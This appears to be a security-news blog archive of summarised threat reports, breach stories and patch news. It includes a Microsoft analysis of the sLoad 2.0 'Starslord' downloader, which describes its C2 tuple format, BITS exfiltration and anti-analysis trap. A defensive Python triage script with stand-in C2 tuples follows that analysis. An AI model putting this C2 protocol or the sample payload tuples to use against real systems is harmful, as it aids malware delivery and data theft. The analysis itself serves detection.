Category Archives: Cybersecurity

LoRaWAN Encryption Keys Easy to Crack, Jeopardizing Security of IoT Networks

New research from IOActive has found that “blindly” trusting the encryption of the widely adopted device protocol can lead to DDoS, sending of false data and other cyber attacks.

The 2020 Annual Threat Report Blog

Estimated reading time: 2 minutes

As the enterprise security brand of Quick Heal Technologies Ltd., Seqrite develops security management products across endpoints, mobile devices, servers and networks. Building on our data from threat research, intelligence and cybersecurity, our recently released Annual Threat Report 2020 aims to provide a detailed understanding of the malware of 2019.

While the full report can be found at this link, here is a brief summary of the most significant findings from the report:

Malware infection continues to be a threat

Seqrite detected over 146 million malware samples in 2019, a massive number. The highest malware detection happened in Q4 2019, which saw 46 million malware samples detected. In terms of hourly malware detection highlights for 2019, 16,732 cases was the maximum seen.

Trojan continues to be a danger

In terms of category-wise malware detection statistics, Trojan malware remained prevalent with just above 25 million detections in 2019. It remained a threat throughout the year, seeing a major upsurge in the last quarter.

Q4 sees a spike in malware

From the data, it is quite evident that malware sees a pronounced spike towards the end of the year. Seqrite detected 46 million malware in Q4, compared to a little above 35 million in Q3, 30 million in Q2 and 25 million in Q1. November and December 2019 also saw the largest number of malware attacks with over 18 million detected in December and above 14 million detected in November.

Real-Time Scan remains a big plus

In terms of malware detection, Real-Time protection methodology is a clear winner and a big differentiator. 51% of malware was detected through Real-Time Scan while the second most effective methodology was Behavioral Detection Scan with 23%. On-Demand Scan came a close third with 22%.

The topmost detected malware

The data showed that the following malware were detected the most on business endpoints:

  • Pioneer.CZ1 was the most commonly detected malware, seen on 22% of endpoints. It is a file infector which performs malicious activities and communicates with a CNC server.
  • Sality.U was detected on 13% of endpoints and is a file infector which performs a range of harmful activities, including stealing confidential data from the system.
  • KillAv.Dr was detected on 12% of endpoints; it steals IP information and other personal data.


The manufacturing sector remains at highest risk

The manufacturing sector saw the highest number of malware attacks in 2019 with over 8 million detections. The education and the professional sectors were second and third on the list with over 7 million and around 6 million attacks, respectively.

APT attacks will continue

The Annual Threat Report 2020 also has a detailed section on Advanced Persistent Threats (APTs) which are designed to infiltrate high-value targets important to national governments such as the military, power grids, nuclear plants, etc. APTs are typically used by nation-states for cyber warfare.

Seqrite analyzed two APT attacks against important Indian government organizations in 2019. Operation m_project is a long-running cyber-espionage campaign against Indian government organizations, active since 2015, that targets defence organizations, government media houses and protection & security organizations.

Seqrite Labs also analyzed the alleged cyber-attack on a Nuclear Power Plant in India and tried to decipher the modus operandi. The incident raised huge questions on the security aspects of critical national infrastructure and it was alleged that an infamous group from North Korea was behind the attack. Seqrite Labs hypothesized that the targeted attack could have been carried out by spear-phishing emails.

Be sure to read the full report for more details on the key findings mentioned in the report. Seqrite continues to be the leading source for the most relevant threat intelligence in the world of enterprise security.

The post The 2020 Annual Threat Report Blog appeared first on Seqrite Blog.

Cyber Threat Trends Dashboard

Marco Ramilli published the Cyber Threat Trends Dashboard, a useful tool that will allow us to better understand the most active threats in real time.

Introduction

Information sharing is one of the most important activities that cybersecurity researchers do on a daily basis. Thanks to “infosharing” activities it is possible to block or, in specific cases, to prevent cyber attacks. Most infosharing activities in cybersecurity are focused on Indicators of Compromise such as URLs, IPs, domains and file hashes, which are well suited to arming protection tools such as proxies, next-generation firewalls and antivirus engines.

Cyber Threat Trends Dashboard

Collecting and analyzing publicly available samples every single day, I became more and more interested in the evolution of cyber threats (Cyber Threats Trend) rather than in specific single analyses, which, after hundreds of them, could get boring (no more emotion in analyzing the next Ransomware or a new Emotet version 😛 ). Regarding APT, well, it’s another cup of tea (a lot of passion in understanding the next steps in there). So I decided to develop a super simple dashboard showing in real time (as soon as I get analyses done) the threat trends that are observed over days. The dashboard is available HERE (on the top menu TOOLS => Cyber Threat Trends). So far only a few basic pieces of information are shown; if you would like to see more stats/graphs/info, please feel free to contact me (HERE).

Description

The aim of this dashboard is to monitor trends over thousands, even millions, of samples, providing quantitative analyses of what has been observed during the automatic analyses performed. The data in this dashboard is totally auto-generated, without control and with no post-processing. You should consider it raw data from which you can start your own research and eventually apply your personal filters or considerations. If you do that, you should be aware that false positives could be around the corner. Let’s move on to the current graphs and try to explain what I’d like to show with them, but before getting in you should be aware that all the digits on the graphs express percentages and not absolute numbers. Now let’s dig a little bit into them.

  • Malware Families Trends. Detection distribution over time; in other words, the time-frames in which specific families are most active with respect to others.
  • Malware Families. Automatic Yara rules classify samples into families. Many samples were not classified in terms of families; this happens when no signatures match the sample or when multiple family signatures match the same sample. In both cases I am not sure which family the sample belongs to, so it is classified as “unknown” and not visualized on this graph. The missing slice of the pie is attributed to “unknown”.
  • Distribution Types. Based on the file’s magic bytes, this graph tracks the percentages of file types that malware used as a carrier.
  • Threat Level Distribution. Levels run from 0 to 3, getting more and more dangerous. It would be interesting to understand the threat level of unknown families as well, in order to understand whether malware or false positives hide among the unknown families. For this reason a dedicated graph named Unknown Families Threat Level Distribution has been created.
  • TOP domains, TOP processes and TOP File Names. With a sliding window of the last 300 analyzed samples, the backend extracts the TOP (in terms of frequency) contacted domains, spawned processes and used file names. Again, there is no filter and no post-processing analysis in those fields, meaning you could probably find “google.com” or “microsoft update” as a TOP domain, which is fine: if the sample queried them before performing its malicious intent, that is simply recorded and brought to your attention. Same cup of tea with processes and file names. Indeed, those fields include the term “involved” in their title; if something is involved it does not mean that it is malicious, but that it is accounted to be in a malicious chain.

Conclusion

The introduced dashboard is part of my cybersecurity community contribution, like every free tool released in the “Tools” menu box. Cyber Threat Trends dynamically evolves over time and you might find it useful for asking questions about live statistics on cybersecurity threats. If you are a journalist or a cybersecurity enthusiast you might find some answers to trending questions to be elaborated over time.

The Cyber Threat Trends Dashboard is available on Marco Ramilli’s blog at the following URL:

Pierluigi Paganini

(SecurityAffairs – Cyber Threat Trends Dashboard, cybersecurity)

The post Cyber Threat Trends Dashboard appeared first on Security Affairs.

Data breach: Why it’s time to adopt a risk-based approach to cybersecurity

The recent high-profile ransomware attack on foreign currency exchange specialist Travelex highlights the devastating results of a targeted cyber-attack. In the weeks following the initial attack, Travelex struggled to bring its customer-facing systems back online. Worse still, despite Travelex’s assurances that no customer data had been compromised, hackers were demanding $6 million for 5GB of sensitive customer information they claim to have downloaded. Providing services to some of the world’s largest banking corporations including HSBC, … More

The post Data breach: Why it’s time to adopt a risk-based approach to cybersecurity appeared first on Help Net Security.

How to detect and prevent issues with vulnerable LoRaWAN networks

IOActive researchers found that the LoRaWAN protocol – which is used across the globe to transmit data to and from IoT devices in smart cities, Industrial IoT, smart homes, smart utilities, vehicle tracking and healthcare – has a host of cyber security issues that could put network users at risk of attack. Such attacks could cause widespread disruption or in extreme cases even put lives at risk. Session Keys and Functions in LoRaWAN v1.0.3 Vulnerable … More

The post How to detect and prevent issues with vulnerable LoRaWAN networks appeared first on Help Net Security.

52% of companies use cloud services that have experienced a breach

Seventy-nine percent of companies store sensitive data in the public cloud, according to a McAfee survey. Anonymized cloud event data showing percentage of files in the cloud with sensitive data While these companies approve an average of 41 cloud services each, up 33 percent from last year, thousands of other services are used ad-hoc without vetting. In addition, 52 percent of companies use cloud services that have had user data stolen in a breach. By … More

The post 52% of companies use cloud services that have experienced a breach appeared first on Help Net Security.

Recommendations for navigating the dynamic cybercrime landscape

In this interview, Mark Sangster, VP & Industry Security Strategist at eSentire, talks about the most pressing issues CISOs are dealing with in today’s fast-paced threat environment. How has the cybersecurity threat landscape evolved in the past 5 years? What are some of the most notable threats eSentire is seeing that were not an issue in the past? The past five years have seen significant progress in both the recognition of cybercrime, but also … More

The post Recommendations for navigating the dynamic cybercrime landscape appeared first on Help Net Security.

You can upgrade Windows 7 for free! Why wouldn’t you?

“Doomsday is here! The sky is falling! Windows 7 is out of support and all hell will break loose!” – or, at least, that’s what some cybersecurity experts and press outlets want you to think. In this article, I will offer some advice to businesses of all sizes that may need to continue using Windows 7, while understanding the risk. This is my opinion and should be taken as advice only. Every company is different, … More

The post You can upgrade Windows 7 for free! Why wouldn’t you? appeared first on Help Net Security.

Patients believe stronger privacy protections are more important than easier health data access

Patients and consumers deserve better access to personalized, actionable health care information to empower them to make better, more informed decisions – but it should not drive up health care costs or compromise the privacy of their personal health data, according to a poll of patients and consumers from Morning Consult and America’s Health Insurance Plans (AHIP). Personal privacy outweighs increased transparency A strong majority (62%) of patients want their data and privacy protected more … More

The post Patients believe stronger privacy protections are more important than easier health data access appeared first on Help Net Security.

Lessons from Microsoft’s 250 million data record exposure

Microsoft has one of the best security teams and capabilities of any organization in the technology industry, yet it accidentally exposed 250 million customer records in December 2019. The data was accessible to anyone with a browser, who knew the server location, for about a month in total before an external researcher detected the problem. The database held records of customer support engagements dating back to 2005. Once alerted, Microsoft quickly closed the hole, investigated … More

The post Lessons from Microsoft’s 250 million data record exposure appeared first on Help Net Security.

Seqrite’s top ten most-read blogs in 2019

Estimated reading time: 3 minutes

2019 was an action-packed year for cybersecurity. Nation-states continued their progress towards drafting data protection laws with the world still coming to terms with changing technologies in cybersecurity. Seqrite blogs analyzed the latest trends in the cybersecurity industry — here were the top ten most-read blogs of 2019.

1.     Artificial Intelligence – its Use & Misuse

While the term ‘artificial intelligence’ continues to become more popular and conjure up images of the futuristic technology, it is important to understand what exactly it is. This article provides an explanation of artificial intelligence along with its functionalities in the cybersecurity space. It also articulates the various ways in which AI could be misused.

2.     Can EVMs get hacked? We tell you the truth

The year 2019 saw momentous elections in countries as varied as India, the United Kingdom, Indonesia and Israel. The modern era of technology has given rise to various fears about whether Electronic Voting Machines (EVMs) can be hacked. This article analyzes such concerns and provides an answer.

3.     This is how hackers can invade your system without installing malware

Attackers are exploiting systems through a dangerous new technique called file-less malware. This type of malware enters systems without alerting cybersecurity solutions, rendering them very dangerous. This article explains how attacks are deployed using this malware and how to prevent them.

4.     Employees working on their personal device? Here’s how to secure them

The Bring Your Own Device revolution has heralded a huge rise in the number of personal devices in the enterprise network. While employees love using their own personal devices for work, these actions have their own security risks and this article explains how to secure personal devices.

5.      The banking sector’s top cybersecurity challenges

In the last few years, the banking sector has seen some major cyber attacks that have resulted in damaging financial repercussions. This is a sector which is at great risk from cybersecurity challenges, and this article explains how to deal with some of the top ones.

6.     5 Cybersecurity Best Practices For Your Small to Medium-Size Business

Small to Medium-Size Businesses (SMEs) often underestimate cybersecurity risks under a mistaken assumption that they will not be targeted by attackers. Ironically, they could actually be at a higher risk. This article outlines the top 5 cybersecurity best practices for SMEs.

7.     The healthcare industry’s largest cyber challenges

The healthcare sector suffers a tremendous number of cyber attacks every year. The cost of cyber attacks on healthcare can also be devastating, as they can have life-and-death consequences. This article explains why the healthcare industry represents such a big cyber risk and what challenges it faces.

8.     What happens when you don’t patch your software?

In 2017, the WannaCry ransomware caused chaos across more than 300,000 systems across different countries. The scale of the attack was momentous and the root cause of it was unpatched systems. This article highlights the danger of letting systems remain unpatched and the troubling consequences that can emerge.

9.     How to reduce the cost of data leakage when an employee is Out Of Office

Vacation periods often see a spike in cyber attacks as employees get carried away and become negligent about cybersecurity. It’s important for enterprises to understand this and invest in solutions like Data Loss Prevention (DLP). This article provides some solutions on how to ensure enterprise cybersecurity remains robust while employees are Out of Office.

10.    Cybersecurity roundup – January to April 2019

The first four months of the year saw a flurry of cyberattacks from across the globe. Whether it was Facebook accidentally uploading email contacts of 1.5 million users or personal data of German politicians being leaked, this article provides an overview of the top cybersecurity news between January and April 2019.

Did we miss out on anything? Tell us!

The post Seqrite’s top ten most-read blogs in 2019 appeared first on Seqrite Blog.

CISOs: Make 2020 the year you focus on third-party cyber risk

While cybersecurity professionals are certainly aware of the growing threat posed by sharing data with third parties, many seem to lack the urgency required to address this challenge. If there is one work-related New Year’s resolution I’d like CISOs to make as we enter 2020, it’s to give the challenge of third-party cyber risk the attention it needs. In fact, I no longer see this as optional or as an extension of an enterprise risk … More

The post CISOs: Make 2020 the year you focus on third-party cyber risk appeared first on Help Net Security.

More authentication and identity tech needed with fraud expected to increase

The proliferation of real-time payments platforms, including person-to-person (P2P) transfers and mobile payment platforms across Asia Pacific, has increased fraud losses for the majority of banks. FICO recently conducted a survey with banks in the region and found that 4 out of 5 (78 percent) have seen their fraud losses increase. Further to this, almost a quarter (22 percent) say that fraud will rise significantly in the next 12 months, with an additional 58 percent … More

The post More authentication and identity tech needed with fraud expected to increase appeared first on Help Net Security.

IoC Scanner shows if Citrix appliances have been compromised via CVE-2019-19781

Citrix and FireEye have teamed up to provide sysadmins with an IoC scanner that shows whether a Citrix ADC, Gateway or SD-WAN WANOP appliance has been compromised via CVE-2019-19781. Finding evidence of compromise By now it should be widely known that CVE-2019-19781 – aka “Shitrix” – is a real and present danger: exploits for it abound and attackers are using them, while we wait for fixes for all affected devices to be released. Though the … More

The post IoC Scanner shows if Citrix appliances have been compromised via CVE-2019-19781 appeared first on Help Net Security.

Cybercriminals using fake job listings to steal money, info from applicants

Be extra careful when looking for a job online, the Internet Crime Complaint Center (IC3) warns: cybercriminals are using fake job listings to trick applicants into sharing their personal and financial information, as well as into sending them substantial sums of money. “While hiring scams have been around for many years, cyber criminals’ emerging use of spoofed websites to harvest PII and steal money shows an increased level of complexity. Criminals often lend credibility to … More

The post Cybercriminals using fake job listings to steal money, info from applicants appeared first on Help Net Security.

Zero Trust: Beyond access controls

As the Zero Trust approach to cybersecurity gains traction in the enterprise world, many people have come to recognize the term without fully understanding its meaning. One common misconception: Zero Trust is all about access controls and additional authentication, such as multi-factor authentication. While these two things help organizations get to a level of Zero Trust, there is more to it: a Zero Trust approach is really an organization-wide architecture. Things aren’t always as they … More

The post Zero Trust: Beyond access controls appeared first on Help Net Security.

There is no easy fix to AI privacy problems

Artificial intelligence – more specifically, the machine learning (ML) subset of AI – has a number of privacy problems. Not only does ML require vast amounts of data for the training process, but the derived system is also provided with access to even greater volumes of data as part of the inference processing while in operation. These AI systems need to access and “consume” huge amounts of data in order to exist and, in many … More

The post There is no easy fix to AI privacy problems appeared first on Help Net Security.

FBI Shuts Down Website Trafficking in Breached Data

The FBI has seized the domain of WeLeakInfo.com, an online service that sold data from hacked and breached websites.

The domain seizure and termination of WeLeakInfo’s services was the result of a joint operation with the UK National Crime Agency, the Netherlands National Police Corps, the German Bundeskriminalamt (the Federal Criminal Police Office of Germany), and the Police Service of Northern Ireland. 

“The website had claimed to provide its users a search engine to review and obtain the personal information illegally obtained in over 10,000 data breaches containing over 12 billion indexed records – including, for example, names, email addresses, usernames, phone numbers, and passwords for online accounts.  The website sold subscriptions so that any user could access the results of these data breaches, with subscriptions providing unlimited searches and access during the subscription period (one day, one week, one month, or three months),” wrote the Justice Department in a public statement.

Records were available on the site for as little as $2 for a single day’s use, or $70 per month for unlimited access to the breached data.

Dutch authorities arrested a 22-year-old man on suspicion of operating the site following the seizure.

The relative frequency and scope of data breaches over the last several years has created a secondary market for aggregated records. Another site offering access to breached passwords, LeakedSource, was seized by Canadian authorities in 2017.

The post FBI Shuts Down Website Trafficking in Breached Data appeared first on Adam Levin.

Container security requires continuous security in new DevSecOps models

When Jordan Liggitt at Google posted details of a serious Kubernetes vulnerability in November 2018, it was a wake-up call for security teams ignoring the risks that came with adopting a cloud-native infrastructure without putting security at the heart of the whole endeavor. For such a significant milestone in Kubernetes history, the vulnerability didn’t have a suitably alarming name comparable to the likes of Spectre, Heartbleed or the Linux Kernel’s recent SACK Panic; it was … More

The post Container security requires continuous security in new DevSecOps models appeared first on Help Net Security.

Email security industry miss rates when encountering threats are higher than 20%

Email security miss rates are definitely a huge issue. Malicious files regularly bypass all of today’s leading email security products, leaving enterprises vulnerable to email-based attacks including ransomware, phishing and data breaches, according to BitDam. BitDam conducted an empirical study to measure leading email security products’ ability to detect unknown threats at first encounter. Unknown threats are produced in the wild, sometimes hundreds in a day. The study employs the retrieval of fresh samples of … More

The post Email security industry miss rates when encountering threats are higher than 20% appeared first on Help Net Security.

sLoad launches version 2.0, Starslord

sLoad, the PowerShell-based Trojan downloader notable for its almost exclusive use of the Windows BITS service for malicious activities, has launched version 2.0. The new version comes on the heels of a comprehensive blog we published detailing the malware’s multi-stage nature and its use of BITS as an alternative protocol for data exfiltration and other behaviors.

With the new version, sLoad has added the ability to track the stage of infection on every affected machine. Version 2.0 also packs an anti-analysis trick that could identify and isolate analyst machines vis-à-vis actual infected machines.

We’re calling the new version “Starslord” based on strings in the malware code, which has clues indicating that the name sLoad may have been derived from a popular comic book superhero.

We discovered the new sLoad version over the holidays, in our continuous monitoring of the malware. New sLoad campaigns that use version 2.0 follow an attack chain similar to the previous version, with some updates, including dropping the dynamic list of command-and-control (C2) servers and upload of screenshots.

Tracking the stage of infection

With the ability to track the stage of infection, malware operators with access to the Starslord backend could build a detailed view of infections across affected machines and segregate these machines into different groups.

The tracking mechanism exists in the final stage, which, as with the old version, loops infinitely (with a sleep interval of 2400 seconds, higher than the 1200 seconds in version 1.0). In line with the previous version, at every iteration of the final stage, the malware uses a download BITS job to exfiltrate stolen system information and receive additional payloads from the active C2 server.

As we noted in our previous blog, creating a BITS job with an extremely large RemoteURL parameter that includes non-encrypted system information, as the old sLoad version did, stands out and is relatively easy to detect. However, with Starslord, the system information is encoded into Base64 data before being exfiltrated.

The file received by Starslord in response to the exfiltration BITS job contains a tuple of three values separated by an asterisk (*):

  • Value #1 is a URL from which to download an additional payload using a download BITS job
  • Value #2 specifies the action, which can be any of the following, to be taken on the payload downloaded from the URL in value #1:
    • “eval” – Run (possibly very large) PowerShell scripts
    • “iex” – Load and invoke (possibly small) PowerShell code
    • “run” – Download an encoded PE file, decode it using exe, and run the decoded executable
  • Value #3 is an integer that can signify the stage of infection for the machine

Supplying the payload URL as part of value #1 allows the malware infrastructure to house additional payloads on different servers from the active C2 servers responding to the exfiltration BITS jobs.

Value #3 is the most noteworthy component in this setup. If the final stage succeeds in downloading the additional payload using the URL provided in value #1 and executing it as specified by the command in value #2, then a variable is used to form the string "td":"<value #3>","tds":"3". However, if the final stage fails to download and execute the payload, then the string formed is "td":"<value #3>","tds":"4".

The infinite loop ensures that the exfiltration BITS jobs are created at a fixed interval. The backend infrastructure can then pick up the pulse from each infected machine. However, unlike the previous version, Starslord includes the said string in succeeding iterations of data exfiltration. This means that the malware infrastructure is always aware of the exact stage of the infection for a specific affected machine. In addition, since the numeric value for value #3 in the tuple is always governed by the malware infrastructure, malware operators can compartmentalize infected hosts and could potentially set off individual groups on unique infection paths. For example, when responding to exfiltration BITS jobs, malware operators can specify a different URL (value #1) and action (value #2) for each numeric value for value #3 of the tuple, essentially deploying a different malware payload for different groups.

Anti-analysis trap

Starslord comes built in with a function named checkUniverse, which is in fact an anti-analysis trap.

As mentioned in our previous blog post, the final stage of sLoad is a piece of PowerShell code obtained by decoding one of the dropped .ini files. The PowerShell code appears in memory as a value assigned to a variable that is then executed using the Invoke-Expression cmdlet. Because this is a huge piece of decrypted PowerShell code that never hits the disk, security researchers would typically dump it into a file on the disk for further analysis.

The sLoad dropper PowerShell script drops four files:

  • a randomly named .tmp file
  • a randomly named .ps1 file
  • the main.ini file
  • the domain.ini file

It then creates a scheduled task to run the .tmp file every 3 minutes, similar to the previous version. The .tmp file is a proxy that does nothing but run the .ps1 file, which decrypts the contents of main.ini into the final stage. The final stage then decrypts the contents of domain.ini to obtain the active C2 and performs the other activities documented previously.

As a unique anti-analysis trap, Starslord ensures that the .tmp and .ps1 files have the same random name. When an analyst dumps the decrypted code of the final stage into a file in the same folder as the .tmp and .ps1 files, the analyst could end up naming it something other than the original random name. When this dumped code is run from such a differently named file on the disk, the function named checkUniverse returns the value 1, and the analyst gets trapped.

What comes next is not very desirable for a security researcher: being profiled by the malware operator.

If the host belongs to a trapped analyst, the file downloaded from the backend in response to the exfiltration BITS job, if any, is discarded and overwritten by the following new tuple:

hxxps://<active C2>/doc/updx2401.jpg*eval*-1

In this case, the value #1 of the tuple is a URL that’s known to the backend for being associated with trapped hosts. BITS jobs from trapped hosts don’t always get a response. If they do, it’s a copy of the dropper PowerShell script. This could be to create an illusion that the framework is being updated as the URL in value #1 of the tuple suggests (hxxps://<active C2>/doc/updx2401.jpg).

However, the string included in all successive exfiltration BITS jobs from such a host is "td":"-1","tds":"3", eventually leading to all such hosts being grouped under the value "td":"-1". This forms the group of all trapped machines, which are never delivered a payload. For the rest, so far, evidence suggests that it has been delivering the file infector Ramnit intermittently.
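The C2 exchange described in the two sections above (the asterisk-separated tuple, the "td"/"tds" status fragment with its trapped-host case, and the move to Base64-encoded host data in the BITS RemoteURL), reproduced from a defender's side as an added example; this is not Microsoft's code nor the malware's. The C2 host, the layout of the encoded host information, the URL-token heuristic and the length threshold are constructed assumptions for the example, since the write-up does not document the exact encoding.

```python
"""Triage helpers for the Starslord (sLoad 2.0) C2 exchange described above.
Added example, not code from the write-up or from the malware itself."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import unquote, urlsplit

# Actions the write-up documents for value #2 of the C2 tuple.
VALID_ACTIONS = {"eval", "iex", "run"}
# Stage value (value #3) the write-up reports for hosts caught by checkUniverse.
TRAPPED_STAGE = -1
# Heuristic thresholds: assumptions for this example, not from the write-up.
LONG_URL_BYTES = 512
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/_-]{40,}={0,2}$")


@dataclass(frozen=True)
class C2Instruction:
    payload_url: str  # value #1: where the next payload is fetched from
    action: str       # value #2: eval | iex | run
    stage: int        # value #3: infection stage assigned by the operator


def parse_c2_tuple(text: str) -> C2Instruction:
    """Parse the 'url*action*stage' file returned for an exfiltration BITS job."""
    parts = text.strip().split("*")
    if len(parts) != 3:
        raise ValueError(f"expected 3 asterisk-separated values, got {len(parts)}")
    url, action, stage = parts
    if action not in VALID_ACTIONS:
        raise ValueError(f"unknown action {action!r}")
    return C2Instruction(url, action, int(stage))


def is_trap_response(instr: C2Instruction) -> bool:
    """True for the tuple the backend sends to hosts profiled as analyst machines."""
    return instr.stage == TRAPPED_STAGE


def beacon_status(stage: int, executed_ok: bool) -> str:
    """Status fragment carried in later exfiltration jobs:
    tds 3 = payload downloaded and executed, tds 4 = download/execute failed."""
    return f'"td":"{stage}","tds":"{3 if executed_ok else 4}"'


def _candidate_tokens(url: str) -> List[str]:
    """Path segments and raw query values, with a camouflage extension (.jpg, .png) removed."""
    parts = urlsplit(url)
    tokens = parts.path.split("/")
    for kv in parts.query.split("&"):
        tokens.append(kv.partition("=")[2])
    return [re.sub(r"\.[A-Za-z0-9]{1,4}$", "", unquote(t)) for t in tokens]


def decode_b64_blobs(url: str) -> List[str]:
    """Return every URL token that decodes as Base64 to printable ASCII text."""
    found = []
    for tok in _candidate_tokens(url):
        if not B64_TOKEN.match(tok):
            continue
        blob = tok.replace("-", "+").replace("_", "/")  # accept URL-safe alphabet too
        blob += "=" * (-len(blob) % 4)                   # restore stripped padding
        try:
            text = base64.b64decode(blob, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            found.append(text)
    return found


def triage_bits_remote_url(url: str) -> Dict[str, object]:
    """Flag a BITS RemoteURL that looks like a beacon carrying encoded host data."""
    blobs = decode_b64_blobs(url)
    return {
        "long_url": len(url) > LONG_URL_BYTES,
        "decoded_blobs": blobs,
        "carries_status": any('"tds":' in b for b in blobs),
        "suspicious": len(url) > LONG_URL_BYTES or bool(blobs),
    }


# Constructed samples (not real sLoad traffic): a normal response, the trap tuple
# quoted in the write-up, and a beacon URL carrying Base64-encoded host data.
SAMPLE_RESPONSE = "https://c2.example.invalid/p/stage2.bin*run*2"
TRAP_RESPONSE = "hxxps://<active C2>/doc/updx2401.jpg*eval*-1"
HOST_INFO = "WORKSTATION-7;user;10.0.18362;" + beacon_status(2, True)
SAMPLE_BEACON_URL = ("https://c2.example.invalid/img/"
                     + base64.b64encode(HOST_INFO.encode()).decode() + ".png")

if __name__ == "__main__":
    for line in (SAMPLE_RESPONSE, TRAP_RESPONSE):
        instr = parse_c2_tuple(line)
        print(instr, "TRAP" if is_trap_response(instr) else "normal")
    print(triage_bits_remote_url(SAMPLE_BEACON_URL))
```

Run against captured BITS job RemoteURLs (for example from the BITS operational event log), the triage function surfaces beacons whose path or query decodes to readable host data, which the plaintext-URL detection from the previous sLoad version would no longer catch.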

Durable protection against evolving malware

sLoad’s multi-stage attack chain, use of mutated intermediate scripts and of BITS as an alternative protocol, and its polymorphic nature in general make it a piece of malware that can be quite tricky to detect. Now it has evolved into a new and polished version, Starslord, which retains sLoad’s most basic capabilities but does away with spyware capabilities in favor of new and more powerful features, posing an even higher risk.

Starslord can track and group affected machines based on the stage of infection, which can allow for unique infection paths. Interestingly, given the distinct reference to a fictional superhero, these groups can be thought of as universes in a multiverse. In fact, the malware uses a function called checkUniverse to determine if a host is an analyst machine.

Microsoft Threat Protection defends customers from sophisticated and continuously evolving threats like sLoad using multiple industry-leading security technologies that protect various attack surfaces. Through signal-sharing across multiple Microsoft services, Microsoft Threat Protection delivers comprehensive protection for identities, endpoints, data, apps, and infrastructure.

On endpoints, behavioral blocking and containment capabilities in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) ensure durable protection against evolving threats. Through cloud-based machine learning and data science informed by threat research, Microsoft Defender ATP can spot and stop malicious behaviors from threats, both old and new, in real time.

Sujit Magar

Microsoft Defender ATP Research Team

The post sLoad launches version 2.0, Starslord appeared first on Microsoft Security.

First patches for the Citrix ADC, Gateway RCE flaw released

As attackers continue to hit vulnerable Citrix (formerly Netscaler) ADC and Gateway installations, Citrix has released permanent fixes for some versions and has promised to provide them for other versions and for two older versions of SD-WAN WANOP by January 24.

A short timeline before the situation update

CVE-2019-19781, a critical vulnerability affecting Citrix ADC and Gateway that may allow unauthenticated attackers to achieve remote code execution and obtain direct access to an organization’s local … More

The post First patches for the Citrix ADC, Gateway RCE flaw released appeared first on Help Net Security.

Researchers create OT honeypot, attract exploits and fraud

Trend Micro announced the results of research featuring a honeypot imitating an industrial factory. The highly sophisticated Operational Technology (OT) honeypot attracted fraud and financially motivated exploits.

Hardware equipment that ran the factory

Complex investigation

The six-month investigation revealed that unsecured industrial environments are primarily victims of common threats. The honeypot was compromised for cryptocurrency mining, targeted by two separate ransomware attacks, and used for consumer fraud. “Too often, discussion of cyber threats to industrial … More

The post Researchers create OT honeypot, attract exploits and fraud appeared first on Help Net Security.

Mitsubishi Electric discloses data breach, possible data leak

Japanese multinational Mitsubishi Electric has admitted that it had suffered a data breach some six months ago, and that “personal information and corporate confidential information may have been leaked.” The company, though, claims that “sensitive information on social infrastructure such as defense, electric power, and railways, highly confidential technical information, and important information concerning business partners have not been leaked.”

What was compromised in the Mitsubishi Electric data breach?

Mitsubishi Electric is a manufacturer of … More

The post Mitsubishi Electric discloses data breach, possible data leak appeared first on Help Net Security.

Data-driven vehicles: The next security challenge

Companies are increasingly building smart products that are tailored to know the individual user. In the automotive world, the next generation passenger vehicle could behave like a personal chauffeur, sentry and bodyguard rolled into one. Over the next decade, every car manufacturer that offers any degree of autonomy in a vehicle will be forced to address the security of both the vehicle and your data, while also being capable of recognizing and defending against threats … More

The post Data-driven vehicles: The next security challenge appeared first on Help Net Security.

Review: Enzoic for Active Directory

Seemingly every day news drops that a popular site with millions of users had been breached and its user database leaked online. Almost without fail, attackers try to use those leaked user credentials on other sites, making password stuffing one of the most common attacks today. Users often use the same username/email and password combination for multiple accounts and, unfortunately, enterprise accounts are no exception. Attackers can, therefore, successfully use leaked credentials to access specific … More

The post Review: Enzoic for Active Directory appeared first on Help Net Security.

Techniques and strategies to overcome Kubernetes security challenges

Five security best practices for DevOps and development professionals managing Kubernetes deployments have been introduced by Portshift. Integrating these security measures into the early stages of the CI/CD pipeline will assist organizations in the detection of security issues earlier, allowing security teams to remediate issues quickly.

Kubernetes as the market leader

The use of containers continues to rise in popularity in test and production environments, increasing demand for a means to manage and orchestrate them. … More

The post Techniques and strategies to overcome Kubernetes security challenges appeared first on Help Net Security.

A look at cybersecurity for rail systems, building automation and the future of critical infrastructure

Waterfall Security Solutions announced a major expansion into new markets and industry verticals. In support of this expansion, Waterfall has secured a significant new funding round to enable aggressive growth. We caught up with Lior Frenkel, CEO and co-founder of the company, to find out more. So Lior, you folks just announced a big new expansion and investment. What are your main priorities for Waterfall Security in the next 5 years? Well, let me first … More

The post A look at cybersecurity for rail systems, building automation and the future of critical infrastructure appeared first on Help Net Security.

NIST Privacy Framework 1.0: Manage privacy risk, demonstrate compliance

Our data-driven society has a tricky balancing act to perform: building innovative products and services that use personal data while still protecting people’s privacy. To help organizations keep this balance, the National Institute of Standards and Technology (NIST) is offering a new tool for managing privacy risk.

Version 1.0 of the NIST Privacy Framework

The agency has just released Version 1.0 of the NIST Privacy Framework: A Tool for Improving Privacy through Enterprise Risk Management. … More

The post NIST Privacy Framework 1.0: Manage privacy risk, demonstrate compliance appeared first on Help Net Security.

Security Affairs newsletter Round 247

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Google removed 1.7K+ Joker Malware infected apps from its Play Store
MageCart attack hit Australia bushfire Donors
New Bill prohibits intelligence sharing with countries using Huawei 5G equipment
5G – The Future of Security and Privacy in Smart Cities
Facebook quickly fixed a bug exploited in attacks that exposed Page Admins info
Hacker that hit UK National Lottery in 2016 was sentenced to prison
Maze Ransomware operators leak 14GB of files stolen from Southwire
US officials meet UK peers to remark the urgency to ban Huawei 5G tech
China-linked APT40 group hides behind 13 front companies
Cisco addressed a high-severity bug in Webex that could allow Remote Code Execution
January 2020 Adobe Patch Tuesday updates fix issues in Illustrator, Experience Manager
Why Russian APT Fancy Bear hacked the Ukrainian energy firm Burisma?
Hacker offers for sale 49 million user records from US data broker LimeLeads
Iranian Threat Actors: Preliminary Analysis
Microsoft addresses CVE-2020-0601 flaw, the first issue ever reported by NSA
P&N Bank data breach may have impacted 100,000 West Australians
VMware addresses flaws in VMware Tools and Workspace ONE SDK
